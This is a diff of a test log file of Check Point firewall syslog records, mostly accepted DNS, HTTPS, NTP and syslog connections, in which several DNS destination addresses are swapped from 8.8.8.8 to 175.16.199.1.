+<134>1 2020-03-29T17:25:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da25,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502757"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33465"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da25,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502757"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42628"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da25,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502757"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59548"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da26,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53818"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:25:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da26,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34740"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10068"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:25:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da26,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56150"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
@@ -2882,7 +2882,7 @@
 <134>1 2020-03-29T17:25:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da26,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50064"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10070"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:26:05Z gw-da58d3 CheckPoint 8363 - [flags:"278528"; ifdir:"inbound"; loguid:"{0x5e80d9f0,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; log_id:"2"; product:"Anti Malware"; received_bytes:"21517"; sent_bytes:"2111"; session_id:"{0x5e80d9f0,0x2,0x353707c7,0xee78a1dc}"; severity:"2"; suppressed_logs:"2"]
 <134>1 2020-03-29T17:26:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da2f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:26:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da38,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502776"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52272"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:26:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da38,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502776"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52272"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:26:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da39,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"185.33.223.197"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43166"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:26:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da39,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"185.33.223.197"; log_delay:"1585502777"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43168"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:26:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da39,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"185.33.223.197"; log_delay:"1585502777"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43170"; service:"443"; service_id:"https"; src:"192.168.2.2"]
@@ -2895,8 +2895,8 @@
 <134>1 2020-03-29T17:27:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da82,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.1"; log_delay:"1585502850"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43882"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:27:32Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da84,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:27:50Z gw-da58d3 CheckPoint 8363 - [flags:"18688"; ifdir:"inbound"; loguid:"{0x5e80d9f0,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; log_id:"2"; packet_capture_name:"src-192.168.2.2.cap"; packet_capture_time:"1585502870"; packet_capture_unique_id:"time1585502754.id4fcdead8.blade04"; product:"Anti Malware"]
-<134>1 2020-03-29T17:27:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da9a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40826"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:27:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da9a,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502874"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43926"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:27:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da9a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40826"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:27:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da9a,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502874"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43926"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:27:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da9a,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"188.40.137.18"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"49904"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:27:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da9e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39040"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:27:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da9e,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34786"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10071"; xlatesrc:"0.0.0.0"]
@@ -2904,7 +2904,7 @@
 <134>1 2020-03-29T17:27:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da9e,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50108"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10072"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:27:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da9e,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36882"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:27:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da9e,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37728"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10073"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T17:28:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80daa2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502882"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53530"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:28:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80daa2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502882"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53530"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:28:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80daa4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
